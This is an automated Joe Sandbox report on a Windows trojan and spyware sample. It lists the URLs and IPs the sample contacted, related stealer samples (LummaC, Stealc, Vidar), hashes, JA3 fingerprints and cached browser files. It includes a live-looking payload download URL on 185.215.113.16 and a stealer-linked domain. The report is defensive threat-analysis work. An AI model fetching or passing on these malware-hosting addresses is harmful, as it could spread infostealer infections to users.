http://185.215.113.16/off/def.exe	TTsfmr1RWm.exe, 00000000.00000002.2633624769.0000000001328000.00000004.00000020.00020000.00000000.sdmp, TTsfmr1RWm.exe, 00000000.00000003.2481754685.0000000001343000.00000004.00000020.00020000.00000000.sdmp	false		high
http://schema.org/Organization	chromecache_108.6.dr	false		high
https://channel9.msdn.com/	chromecache_87.6.dr, chromecache_109.6.dr	false		high
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=	TTsfmr1RWm.exe, 00000000.00000003.2295253791.0000000005B3A000.00000004.00000800.00020000.00000000.sdmp, TTsfmr1RWm.exe, 00000000.00000003.2295143679.0000000005B3C000.00000004.00000800.00020000.00000000.sdmp	false		high
https://bridge.sfo1.ap01.net/ctp?version=16.0.0&key=1696484494400800000.1&ci=1696484494189.12791&cta	TTsfmr1RWm.exe, 00000000.00000003.2369470224.000000000134E000.00000004.00000020.00020000.00000000.sdmp	false		high
https://github.com/dotnet/try	chromecache_87.6.dr, chromecache_109.6.dr	false		high

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
185.215.113.16	unknown	Portugal	206894	WHOLESALECONNECTIONSNL	false
239.255.255.250	unknown	Reserved	unknown	unknown	false
142.250.181.68	www.google.com	United States	15169	GOOGLEUS	false
104.21.11.101	mindhandru.buzz	United States	13335	CLOUDFLARENETUS	false

Private

IP
192.168.2.6

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1580869
Start date and time:	2024-12-26 12:40:10 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 7m 24s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	9
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	TTsfmr1RWm.exe renamed because original name is a hash value
Original Sample Name:	a2e3e7417756b4b817f2fbca4c98ec6e.exe
Detection:	MAL
Classification:	mal100.troj.spyw.evad.winEXE@24/64@9/5
EGA Information:	Successful, ratio: 100%
HCA Information:	Failed
Cookbook Comments:	Found application associated with file extension: .exe

Warnings

Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe, svchost.exe
Excluded IPs from analysis (whitelisted): 192.229.221.95, 217.20.58.101, 199.232.210.172, 172.217.21.35, 172.217.19.238, 64.233.161.84, 23.218.210.69, 184.30.22.94, 172.217.17.46, 52.182.143.215, 172.217.19.170, 172.217.19.234, 172.217.19.202, 142.250.181.10, 172.217.21.42, 172.217.19.10, 142.250.181.138, 172.217.17.42, 142.250.181.42, 142.250.181.74, 172.217.17.74, 142.250.181.106, 23.32.238.130, 2.19.198.56, 13.74.129.1, 13.107.21.237, 204.79.197.237, 172.217.17.35, 13.107.246.63, 52.149.20.212, 23.218.208.109
Excluded domains from analysis (whitelisted): slscr.update.microsoft.com, c-msn-com-nsatc.trafficmanager.net, otelrules.afd.azureedge.net, clientservices.googleapis.com, browser.events.data.trafficmanager.net, learn.microsoft.com, e11290.dspg.akamaiedge.net, mdec.nelreports.net.akamaized.net, clients2.google.com, go.microsoft.com, ocsp.digicert.com, redirector.gvt1.com, star-azurefd-prod.trafficmanager.net, a1883.dscd.akamai.net, learn.microsoft.com.edgekey.net, update.googleapis.com, onedscolprdcus22.centralus.cloudapp.azure.com, client.wns.windows.com, fs.microsoft.com, accounts.google.com, content-autofill.googleapis.com, otelrules.azureedge.net, c-bing-com.dual-a-0034.a-msedge.net, ctldl.windowsupdate.com, learn.microsoft.com.edgekey.net.globalredir.akadns.net, firstparty-azurefd-prod.trafficmanager.net, fe3cr.delivery.mp.microsoft.com, browser.events.data.microsoft.com, edgedl.me.gvt1.com, e13636.dscb.akamaiedge.net, c.bing.com, learn-public.trafficmanager.net, go.microsoft.com.edgekey.net, azureedge-t-p
Not all processes where analyzed, report is missing behavior information
Report size exceeded maximum capacity and may have missing behavior information.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

Simulations

Behavior and APIs

Time	Type	Description
06:41:16	API Interceptor	53x Sleep call for process: TTsfmr1RWm.exe modified

LLM Input / Output

Input	Output
URL: https://microsoft.com Model: Joe Sandbox AI	{ "typosquatting": false, "unusual_query_string": false, "suspicious_tld": false, "ip_in_url": false, "long_subdomain": false, "malicious_keywords": false, "encoded_characters": false, "redirection": false, "contains_email_address": false, "known_domain": true, "brand_spoofing_attempt": false, "third_party_hosting": false }
URL: https://microsoft.com
URL: https://learn.microsoft.com/en-us/dotnet/framework/install/application-not-started?version=(null)&processName=TTsfmr1RWm.exe&platform=0009&osver=6&isServer=0&shimver=4.0.30319.0 Model: Joe Sandbox AI	{ "contains_trigger_text": true, "trigger_text": "This application could not be started", "prominent_button_name": "Yes", "text_input_field_labels": "unknown", "pdf_icon_visible": false, "has_visible_captcha": false, "has_urgent_text": false, "has_visible_qrcode": false, "contains_chinese_text": false, "contains_fake_security_alerts": false }

URL: https://learn.microsoft.com/en-us/dotnet/framework/install/application-not-started?version=(null)&processName=TTsfmr1RWm.exe&platform=0009&osver=6&isServer=0&shimver=4.0.30319.0 Model: Joe Sandbox AI	{ "contains_trigger_text": true, "trigger_text": "This application could not be started", "prominent_button_name": "unknown", "text_input_field_labels": "unknown", "pdf_icon_visible": false, "has_visible_captcha": false, "has_urgent_text": false, "has_visible_qrcode": false, "contains_chinese_text": false, "contains_fake_security_alerts": false }

URL: https://learn.microsoft.com/en-us/dotnet/framework/install/application-not-started?version=(null)&processName=TTsfmr1RWm.exe&platform=0009&osver=6&isServer=0&shimver=4.0.30319.0 Model: Joe Sandbox AI	{ "brands": [ "Microsoft" ] }
	{ "brands": [ "Microsoft" ] }
URL: https://learn.microsoft.com/en-us/dotnet/framework/install/application-not-started?version=(null)&processName=TTsfmr1RWm.exe&platform=0009&osver=6&isServer=0&shimver=4.0.30319.0 Model: Joe Sandbox AI	{ "brands": [ "Microsoft" ] }
	{ "brands": [ "Microsoft" ] }

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
185.215.113.16	iUKUR1nUyD.exe	Get hash	malicious	LummaC, Amadey, LummaC Stealer, Stealc, Vidar	Browse	185.215.113.16/mine/random.exe
	O5Vg1CJsxN.exe	Get hash	malicious	LummaC, Stealc	Browse	185.215.113.16/steam/random.exe
	y001L6lEK4.exe	Get hash	malicious	LummaC, Stealc	Browse	185.215.113.16/steam/random.exe
	ElmEHL9kP9.exe	Get hash	malicious	LummaC, Amadey, LummaC Stealer, Stealc, Vidar	Browse	185.215.113.16/mine/random.exe
	xlSzrIs5h6.exe	Get hash	malicious	LummaC, Stealc	Browse	185.215.113.16/steam/random.exe
	2jx1O1t486.exe	Get hash	malicious	LummaC, Stealc	Browse	185.215.113.16/steam/random.exe
	fkawMJ7FH8.exe	Get hash	malicious	LummaC, Amadey, LummaC Stealer, RedLine, Stealc	Browse	185.215.113.16/Jo89Ku7d/index.php
	BVGvbpplT8.exe	Get hash	malicious	LummaC, Stealc	Browse	185.215.113.16/steam/random.exe
	FBVmDbz2nb.exe	Get hash	malicious	LummaC, Stealc	Browse	185.215.113.16/steam/random.exe
	Bire1g8ahY.exe	Get hash	malicious	LummaC, Stealc	Browse	185.215.113.16/steam/random.exe

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
mindhandru.buzz	dEugughckk.exe	Get hash	malicious	LummaC	Browse	172.67.165.185
mindhandru.buzz	Solara-v3.0.exe	Get hash	malicious	LummaC	Browse	172.67.165.185
s-part-0035.t-0009.t-msedge.net	HVlonDQpuI.exe	Get hash	malicious	Vidar	Browse	13.107.246.63
	Purchase Order No. G02873362-Docx.vbs	Get hash	malicious	LodaRAT, XRed	Browse	13.107.246.63
	blq.exe	Get hash	malicious	Gh0stCringe, RunningRAT, XRed	Browse	13.107.246.63
	https://issuu.com/txbct.com/docs/navex_quote_65169.?fr=xKAE9_zU1NQ	Get hash	malicious	HTMLPhisher	Browse	13.107.246.63
	New PO - Supplier 0202AW-PER2.exe	Get hash	malicious	LodaRAT, XRed	Browse	13.107.246.63
	aYf5ibGObB.exe	Get hash	malicious	RedLine	Browse	13.107.246.63
	https://u48635528.ct.sendgrid.net/ls/click?upn=u001.9c3qucD-2BQzNTT0bmLRTJr37m0fhz0zdKJtvEO5GYL-2FheRuyVOh-2FQG4V3oBgBPYNynDxn_I1ksFJapfNmw0nKrksu71KTxdlg2CVrjzBUVofCtIEhaWkhL1Pph-2Ffg-2BCFbPvkCL9SX-2Fn-2BNBrku3RcjHS1atB8ladrmemt-2BtQU5680xhgoUl-2FmS0Bdj-2FOfednny-2F-2Bj2bwjjubeRvrpN0J7TGLD3CnNRzymiQOzypjCqxHhzmXtY2EWHJMJBxjl-2FHlyEIekWjEdTpTsRC8R5LaI-2BXF4kV8UeUtXxyFJLbYiR3fqcWt2evvBBECu9MeQj8TLZrmfuTf-2BJQraijp8-2BcIdxf8rnVxjHoJK1lo9-2Bkao444JbRSinVA-2FoUxeuAtdlrITU1Z6gHAn7DLZstY4XJkhkT16-2F2TN4CFt2LQ-2BEh9GWg4EPlocPi8ljTs-2B9D9RVbWdc3s2Vk2VPHSj20oCO3-2FalihBzGJuaYie5tnYaz6wBF3EqNzMXmVqRnMZwSYuGRwSMVhkchytYzt3hUH-2F51IUfn7nuhHUcUbdS8nBYneAMuB2eSDRn8IZzUkExLUascCVn8T9ImEyo0qhVsBPdJjfT9L3qli9clY1N-2BhQXDZgQnsN1Bs9PujeLzem37C62BvWnqPnqvXh5vbcvseiZwTP35DEJysw-3D-3D#mlyon@wc.com	Get hash	malicious	HTMLPhisher	Browse	13.107.246.63
	Audio02837498.html	Get hash	malicious	HTMLPhisher	Browse	13.107.246.63
	gDPzgKHFws.exe	Get hash	malicious	Cryptbot	Browse	13.107.246.63
	Technonomic.exe	Get hash	malicious	GuLoader, Snake Keylogger, VIP Keylogger	Browse	13.107.246.63

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
WHOLESALECONNECTIONSNL	iUKUR1nUyD.exe	Get hash	malicious	LummaC, Amadey, LummaC Stealer, Stealc, Vidar	Browse	185.215.113.206
	cMTqzvmx9u.exe	Get hash	malicious	LummaC, Amadey, LummaC Stealer, RedLine	Browse	185.215.113.206
	O5Vg1CJsxN.exe	Get hash	malicious	LummaC, Stealc	Browse	185.215.113.16
	y001L6lEK4.exe	Get hash	malicious	LummaC, Stealc	Browse	185.215.113.16
	ElmEHL9kP9.exe	Get hash	malicious	LummaC, Amadey, LummaC Stealer, Stealc, Vidar	Browse	185.215.113.206
	xlSzrIs5h6.exe	Get hash	malicious	LummaC, Stealc	Browse	185.215.113.16
	2jx1O1t486.exe	Get hash	malicious	LummaC, Stealc	Browse	185.215.113.16
	fkawMJ7FH8.exe	Get hash	malicious	LummaC, Amadey, LummaC Stealer, RedLine, Stealc	Browse	185.215.113.206
	BVGvbpplT8.exe	Get hash	malicious	LummaC, Stealc	Browse	185.215.113.16
	FBVmDbz2nb.exe	Get hash	malicious	LummaC, Stealc	Browse	185.215.113.16
CLOUDFLARENETUS	35K4Py4lii.exe	Get hash	malicious	LummaC	Browse	104.21.66.86
	dEugughckk.exe	Get hash	malicious	LummaC	Browse	172.67.165.185
	Solara-v3.0.exe	Get hash	malicious	LummaC	Browse	172.67.165.185
	1C6ljtnwXP.exe	Get hash	malicious	LummaC	Browse	104.21.80.215
	1C6ljtnwXP.exe	Get hash	malicious	LummaC	Browse	104.21.80.215
	RIMz2N1u5y.exe	Get hash	malicious	LummaC	Browse	172.67.154.166
	HVlonDQpuI.exe	Get hash	malicious	Vidar	Browse	172.64.41.3
	5RRVBiCpFI.exe	Get hash	malicious	LummaC	Browse	104.21.42.145
	MPySEh8HaF.exe	Get hash	malicious	LummaC	Browse	172.67.180.113
	Dotc67890990.exe	Get hash	malicious	Snake Keylogger	Browse	104.21.27.85

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
3b5074b1b5d032e5620f69f9f700ff0e	Dotc67890990.exe	Get hash	malicious	Snake Keylogger	Browse	20.198.119.84
	ciwa.mp4.hta	Get hash	malicious	LummaC, PureLog Stealer	Browse	20.198.119.84
	INQUIRY.exe	Get hash	malicious	MassLogger RAT, PureLog Stealer	Browse	20.198.119.84
	00000.ps1	Get hash	malicious	LummaC	Browse	20.198.119.84
	123.ps1	Get hash	malicious	LummaC	Browse	20.198.119.84
	PodcastsTries.exe	Get hash	malicious	Vidar	Browse	20.198.119.84
	wUSt04rfJ0.exe	Get hash	malicious	Quasar	Browse	20.198.119.84
	#U65b0#U5efa #U6587#U672c#U6587#U6863.ps1	Get hash	malicious	Unknown	Browse	20.198.119.84
	gYjK72gL17.exe	Get hash	malicious	Stealc, Vidar	Browse	20.198.119.84
a0e9f5d64349fb13191bc781f81f42e1	35K4Py4lii.exe	Get hash	malicious	LummaC	Browse	104.21.11.101
	dEugughckk.exe	Get hash	malicious	LummaC	Browse	104.21.11.101
	Solara-v3.0.exe	Get hash	malicious	LummaC	Browse	104.21.11.101
	BootStrapper.exe	Get hash	malicious	LummaC	Browse	104.21.11.101
	Loader.exe	Get hash	malicious	LummaC	Browse	104.21.11.101
	Script.exe	Get hash	malicious	LummaC	Browse	104.21.11.101
	1C6ljtnwXP.exe	Get hash	malicious	LummaC	Browse	104.21.11.101
	1C6ljtnwXP.exe	Get hash	malicious	LummaC	Browse	104.21.11.101
	RIMz2N1u5y.exe	Get hash	malicious	LummaC	Browse	104.21.11.101
	5RRVBiCpFI.exe	Get hash	malicious	LummaC	Browse	104.21.11.101

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 1528x402, components 3
Category:	downloaded
Size (bytes):	64291
Entropy (8bit):	7.964191793580486
Encrypted:	false
SSDEEP:	1536:NHnitWEy8ugr5KeKvJx4FqzmYyIf52YHcd/HpQxhSoywkY8+N4U4Bv:NHitHyJTeysFqiYyIfEYHchQWoywkY8v
MD5:	8CCB0248B7F2ABEEAD74C057232DF42A
SHA1:	C02BD92FEA2DF7ED12C8013B161670B39E1EC52F
SHA-256:	0A9FD0C7F32EABBB2834854C655B958EC72A321F3C1CF50035DD87816591CDCC
SHA-512:	6D6E3C858886C9D6186AD13B94DBC2D67918AA477FB7D70A7140223FAB435CF109537C51CA7F4B2A0DB00EEAD806BBE8C6B29B947B0BE7044358D2823F5057CE
Malicious:	false
Reputation:	moderate, very likely benign file
URL:	https://learn.microsoft.com/en-us/media/event-banners/banner-learn-challenge-2024.jpg
Preview:	......JFIF..............ICC_PROFILE............0..mntrRGB XYZ ............acsp.......................................-....................................................desc.......$rXYZ........gXYZ...(....bXYZ...<....wtpt...P....rTRC...d...(gTRC...d...(bTRC...d...(cprt.......<mluc............enUS.........s.R.G.BXYZ ......o...8.....XYZ ......b.........XYZ ......$.........XYZ ...............-para..........ff......Y.......[........mluc............enUS... .....G.o.o.g.l.e. .I.n.c... .2.0.1.6...C....................................................................C............................................................................"..........................................\......................!1..A.Qaq......".....#23BR......56Urst....$%4ST....&CDbcd......EFV.u...................................[...........................!1.AQR...."2Saq.......Ts.......#356BCDUbr.....%&47c.....$'Et..............?...j.....'Gu..7.=......8. ..nh..F.....y ..=....1L\U.+.Pj.RnI.(...N.{%].b..J..r...W[

Chrome Cache Entry: 101

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	exported SGML document, ASCII text, with very long lines (65536), with no line terminators
Category:	dropped
Size (bytes):	1173007
Entropy (8bit):	5.503893944397598
Encrypted:	false
SSDEEP:	24576:VMga+4IVzOjS1Jho1WXQFjTEr39/jHXzT:VMcVzOjS1Jho1WXQar39/bXzT
MD5:	2E00D51C98DBB338E81054F240E1DEB2
SHA1:	D33BAC6B041064AE4330DCC2D958EBE4C28EBE58
SHA-256:	300480069078B5892D2363A2B65E2DFBBF30FE5C80F83EDBFECF4610FD093862
SHA-512:	B6268D980CE9CB729C82DBA22F04FD592952B2A1AAB43079CA5330C68A86E72B0D232CE4070DB893A5054EE5C68325C92C9F1A33F868D61EBB35129E74FC7EF9
Malicious:	false
Reputation:	moderate, very likely benign file
Preview:	(function(){"use strict";var __webpack_modules__={351:function(t,e,r){var n,o=this&&this.__extends\|\|(n=function(t,e){return n=Object.setPrototypeOf\|\|{__proto__:[]}instanceof Array&&function(t,e){t.__proto__=e}\|\|function(t,e){for(var r in e)Object.prototype.hasOwnProperty.call(e,r)&&(t[r]=e[r])},n(t,e)},function(t,e){if("function"!=typeof e&&null!==e)throw new TypeError("Class extends value "+String(e)+" is not a constructor or null");function r(){this.constructor=t}n(t,e),t.prototype=null===e?Object.create(e):(r.prototype=e.prototype,new r)}),i=this&&this.__assign\|\|function(){return i=Object.assign\|\|function(t){for(var e,r=1,n=arguments.length;r<n;r++)for(var o in e=arguments[r])Object.prototype.hasOwnProperty.call(e,o)&&(t[o]=e[o]);return t},i.apply(this,arguments)},s=this&&this.__read\|\|function(t,e){var r="function"==typeof Symbol&&t[Symbol.iterator];if(!r)return t;var n,o,i=r.call(t),s=[];try{for(;(void 0===e\|\|e-- >0)&&!(n=i.next()).done;)s.push(n.value)}catch(t){o={error:t}}finally

Chrome Cache Entry: 102

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	SVG Scalable Vector Graphics image
Category:	downloaded
Size (bytes):	1154
Entropy (8bit):	4.59126408969148
Encrypted:	false
SSDEEP:	24:txFRuJpzYeGK+VS6ckNL2091JP/UcHc8oQJ1sUWMLc/jH6GbKqjHJIOHA:JsfcU6ckNL2091Z/U/YsUDM+GhS
MD5:	37258A983459AE1C2E4F1E551665F388
SHA1:	603A4E9115E613CC827206CF792C62AEB606C941
SHA-256:	8E34F3807B4BF495D8954E7229681DA8D0DD101DD6DDC2AD7F90CD2983802B44
SHA-512:	184CB63EF510143B0AF013F506411C917D68BB63F2CFA47EA2A42688FD4F55F3B820AF94F87083C24F48AACEE6A692199E185FC5C5CFBED5D70790454EED7F5C
Malicious:	false
Reputation:	moderate, very likely benign file
URL:	https://learn.microsoft.com/en-us/media/logos/logo_net.svg
Preview:	<svg width="456" height="456" viewBox="0 0 456 456" fill="none" xmlns="http://www.w3.org/2000/svg">..<rect width="456" height="456" fill="#512BD4"/>..<path d="M81.2738 291.333C78.0496 291.333 75.309 290.259 73.052 288.11C70.795 285.906 69.6665 283.289 69.6665 280.259C69.6665 277.173 70.795 274.529 73.052 272.325C75.309 270.121 78.0496 269.019 81.2738 269.019C84.5518 269.019 87.3193 270.121 89.5763 272.325C91.887 274.529 93.0424 277.173 93.0424 280.259C93.0424 283.289 91.887 285.906 89.5763 288.11C87.3193 290.259 84.5518 291.333 81.2738 291.333Z" fill="white"/>..<path d="M210.167 289.515H189.209L133.994 202.406C132.597 200.202 131.441 197.915 130.528 195.546H130.044C130.474 198.081 130.689 203.508 130.689 211.827V289.515H112.149V171H134.477L187.839 256.043C190.096 259.57 191.547 261.994 192.192 263.316H192.514C191.977 260.176 191.708 254.859 191.708 247.365V171H210.167V289.515Z" fill="white"/>..<path d="M300.449 289.515H235.561V171H297.87V187.695H254.746V221.249H294.485V237.861H254.746V

Chrome Cache Entry: 103

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text, with very long lines (33273), with no line terminators
Category:	downloaded
Size (bytes):	33273
Entropy (8bit):	4.918756013698695
Encrypted:	false
SSDEEP:	384:FnvJOb4OLIch+KCnMet7NPXlJl+HjZjBTRdE0zIwHdZ4vNNpUjV8din4E9hLUukj:5hOEO8chkMet7pCjBfcHkWOzUukj
MD5:	86E84C732A96BF9CF18C99B48DB90B6D
SHA1:	6A8C212067CB9FE5B8325AE1E89FCA3E7FCF20FA
SHA-256:	B54678C5BFB00DC1AFBF2E52C56F8E10173975C25FB19062EFE5DC86F1B7D769
SHA-512:	AD91A78371074B5BB2105A9AE69664371C235B7C82DFD25C9ED17F435E92018F2A0DD42203F403D7A75DF4FC63966017519F118B2B22F0DE7656B2B155636AA2
Malicious:	false
URL:	https://learn.microsoft.com/en-us/dotnet/framework/toc.json
Preview:	{"items":[{"href":"./","toc_title":".NET Framework documentation"},{"href":"get-started/overview","toc_title":"Overview of .NET Framework"},{"children":[{"href":"get-started/","toc_title":"Overview"},{"href":"get-started/out-of-band-releases","toc_title":"Out-of-band releases"},{"href":"get-started/system-requirements","toc_title":"System requirements"}],"toc_title":"Get started"},{"children":[{"href":"install/","toc_title":"Overview"},{"href":"install/guide-for-developers","toc_title":"For developers"},{"children":[{"href":"install/on-windows-11","toc_title":"Windows 11"},{"href":"install/on-windows-10","toc_title":"Windows 10 and Windows Server 2016"},{"href":"install/on-windows-8-1","toc_title":"Windows 8.1 and Windows Server 2012 R2"},{"href":"install/on-windows-8","toc_title":"Windows 8 and Windows Server 2012"},{"href":"install/on-server-2022","toc_title":"Windows Server 2022"},{"href":"install/on-server-2019","toc_title":"Windows Server 2019"}],"toc_title":"By OS version"},{"hre

Chrome Cache Entry: 104

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	72
Entropy (8bit):	4.241202481433726
Encrypted:	false
SSDEEP:	3:YozDD/RNgQJzRWWlKFiFD3e4xCzY:YovtNgmzR/wYFDxkY
MD5:	9E576E34B18E986347909C29AE6A82C6
SHA1:	532C767978DC2B55854B3CA2D2DF5B4DB221C934
SHA-256:	88BDF5AF090328963973990DE427779F9C4DF3B8E1F5BADC3D972BAC3087006D
SHA-512:	5EF6DCFFD93434D45760888BF4B95FF134D53F34DA9DC904AD3C5EBEDC58409073483F531FEA4233869ED3EC75F38B022A70B2E179A5D3A13BDB10AB5C46B124
Malicious:	false
Preview:	{"Message":"The requested resource does not support http method 'GET'."}

Chrome Cache Entry: 105

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	PNG image data, 475 x 212, 8-bit/color RGBA, non-interlaced
Category:	dropped
Size (bytes):	35005
Entropy (8bit):	7.980061050467981
Encrypted:	false
SSDEEP:	768:aHBEr/QXnbCgWotMq4AZZivq2/Qu0cEv1FjHBep6U0Z/68R:ahWqbTWiM7ACvdIdldhep4rR
MD5:	522037F008E03C9448AE0AAAF09E93CB
SHA1:	8A32997EAB79246BEED5A37DB0C92FBFB006BEF2
SHA-256:	983C35607C4FB0B529CA732BE42115D3FCAAC947CEE9C9632F7CACDBDECAF5A7
SHA-512:	643EC613B2E7BDBB2F61E1799C189B0E3392EA5AE10845EB0B1F1542A03569E886F4B54D5B38AF10E78DB49C71357108C94589474B181F6A4573B86CF2D6F0D8
Malicious:	false
Preview:	.PNG........IHDR..............[.U....sRGB.........gAMA......a.....pHYs..........+.....RIDATx^..`........B hpwww(PJ....R.B.....K[j....@ H ..r:...].P._.`...K.ffg.v.ygf.TM.4.m...`.D".H$......"##..2e.X.t..Y".H$...d..PK.V".H$..uVm.,.H$.....b+.H$.I-#.V".H$.ZF..D".H$...[.D".Hj.)...D"..2Rl%..D".e..J$..DR.H..H$.....b+.H$..9..Neee.X,.B.\/.....o.b+.H$..9...q...EHU....p.....=z....b.7.q..........N.. ....cUAX.9...m'_...2.`.g{...4.H.9.p.4...K ^.....`.\|.n..]..m..`W..W.H.~..\|.^.a..K.6......_....K..w....9......^.....&...R....[...w..Ix=.:..^/..Epp0.5.....QRR...l....S.b.5.c.6...5..8.\....z...I......&.>....../.{.=...]'c......[.E`@Cg......Z.....c.f..,.y\|,.{.o@.j..2..:.&l4.{.]Ll.N.0..b:b...g.n.........I...Ewc....[..,i`v......F...il\|.c,{.-.....%BP.U........y.x....6..E2..n.W...J .*..`..r....F....#BCC......\|.L&........O...'........\.....;...q.n$...7...ga..x....)..A...0.{1..'1../...+yRC...W.-..b..c0dDG...U[po....2eG.G.../.@........h.:.k?.......Q...

Chrome Cache Entry: 106

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	PNG image data, 658 x 480, 8-bit/color RGBA, non-interlaced
Category:	dropped
Size (bytes):	13842
Entropy (8bit):	7.802399161550213
Encrypted:	false
SSDEEP:	192:NLNf+jBQsDHg7av3EEondO8PuRu2mIYXEIiDm42NpsHFMHfgnJ4K2DVwv:NLt+1jDmY+ndXwjLUpiDwpzfwoDVk
MD5:	F6EC97C43480D41695065AD55A97B382
SHA1:	D9C3D0895A5ED1A3951B8774B519B8217F0A54C5
SHA-256:	07A599FAB1E66BABC430E5FED3029F25FF3F4EA2DD0EC8968FFBA71EF1872F68
SHA-512:	22462763178409D60609761A2AF734F97B35B9A818EC1FD9046AFAB489AAD83CE34896EE8586EFE402EA7739ECF088BC2DB5C1C8E4FB39E6A0FC5B3ADC6B4A9B
Malicious:	false
Preview:	.PNG........IHDR................1....sRGB.........gAMA......a.....pHYs..........o.d..5.IDATx^..[.,.]...../<.!.B(/y..).F\r...!(.H..a ..B.~..A..KXA.M...6..8...!1....l./.X.1....2.`.y"l..R...V.....{...}._gWW.Z.VUw.N...U..P@..... ..@.A...".$..E.I.........$..("H..PD..... ..p....U.}.{.....l..A.....A........s.......D.0...@....E..x........L. /.".A.....$...Y."...%.I..["../.&.I..[`.0..IA.........p4.I.........$..("H..PD..... ..@.A...".$..E.I.........$..("H..PD..... ..@.A...".$..E.>H...O.................?.~.......].7.....a?....(H....m.G..G..a.P..?yo......f?...o. .B.....mo{[....:9<].....7.....a.....S..Cd.5,.R....#....>......._g.....Wo\|.....z.g.........w.T...]x.>.....y(.........6....[..px...U....~.~hu...}H.......~.L... ....r...iY.$..Id..Ax"../....._..U....OTo\|.Mh.km..A.k..k....n.C`\|._\=...o...a.e.. ...&.A2..k.. ....X.+...C..P....y..>.{._..(H....8(.?...w.}M.........:s_!.m.........BY..T..z.5{.W.~..6.....F....bq....m.....?.......v....o..o...ki...iX.$......\]V...V...

Chrome Cache Entry: 107

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	4897
Entropy (8bit):	4.8007377074457604
Encrypted:	false
SSDEEP:	96:A0AIvEQ+KfZcbhaW9dp45qtAdflfDOFnymoLByzfwqrLvJ4QG63JkRJ+dRp8TJHr:dgQ+KfZcbhaWjp45qtAdflfDOFnNgByQ
MD5:	0E78F790402498FA57E649052DA01218
SHA1:	9ED4D0846DA5D66D44EE831920B141BBF60A0200
SHA-256:	73F3061A46EA8FD11D674FB21FEEEFE3753FC3A3ED77224E7F66A964C0420603
SHA-512:	B46E4B90E53C7DABC7208A6FDAE53F25BD70FCFBBEF03FFC64B1B5D1EB1C01C870A7309DF167246FCCD114B483038A64D7C46CA3B9FCB3779A77E42DB6967051
Malicious:	false
Preview:	{"callToAction":{"primary":{"biName":"download-dotnet","href":"https://dotnet.microsoft.com/download","kind":"link","title":"Download .NET"}},"category":{"biName":"dotnet","href":"/dotnet/","kind":"link","title":".NET"},"items":[{"biName":"1-languages","items":[{"biName":"1-c-sharp","href":"/dotnet/csharp/","kind":"link","title":"C#"},{"biName":"2-f-sharp","href":"/dotnet/fsharp/","kind":"link","title":"F#"},{"biName":"3-visual-basic","href":"/dotnet/visual-basic/","kind":"link","title":"Visual Basic"}],"kind":"menu","title":"Languages"},{"biName":"2-features","items":[{"biName":"1-fundamental","href":"/dotnet/fundamentals/","kind":"link","title":"Fundamentals"},{"biName":"2-tools-and-diagnostics","href":"/dotnet/navigate/tools-diagnostics/","kind":"link","title":"Tools and diagnostics"},{"biName":"3-ai","items":[{"biName":"1-generative-ai","href":"/dotnet/ai/","kind":"link","title":"Generative AI"},{"biName":"2-mlnet","href":"/dotnet/machine-learning/","kind":"link","title":"ML.NET"}]

Chrome Cache Entry: 108

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	HTML document, ASCII text, with very long lines (639), with CRLF, LF line terminators
Category:	downloaded
Size (bytes):	47062
Entropy (8bit):	5.016149588804727
Encrypted:	false
SSDEEP:	768:haAq16LIElO6L6x2bTI1ln4a1T0MCFnFMBVeZrdLg:hTKGLlO6eAbTIr4audZqBkZRLg
MD5:	1FF4CE3C1DB69A5146B03AD8BE62F5EB
SHA1:	5D177F6D11FCFF2BD62E61983383BB39D9F045E4
SHA-256:	222F320F99EF710DCE98F125314F30DAC99CF408525D86F185B317A878D48A5C
SHA-512:	36D198120D83AA9BDC2E74F80B99E2219EE4F03A8DD93A1E58A9E30BD48E829E5220A9F5FE6FC29B3810ED85005A8DCD0EAD04EE06DCCD0A15CD6D080E88641D
Malicious:	false
URL:	https://learn.microsoft.com/en-us/dotnet/framework/install/application-not-started?version=(null)&processName=TTsfmr1RWm.exe&platform=0009&osver=6&isServer=0&shimver=4.0.30319.0
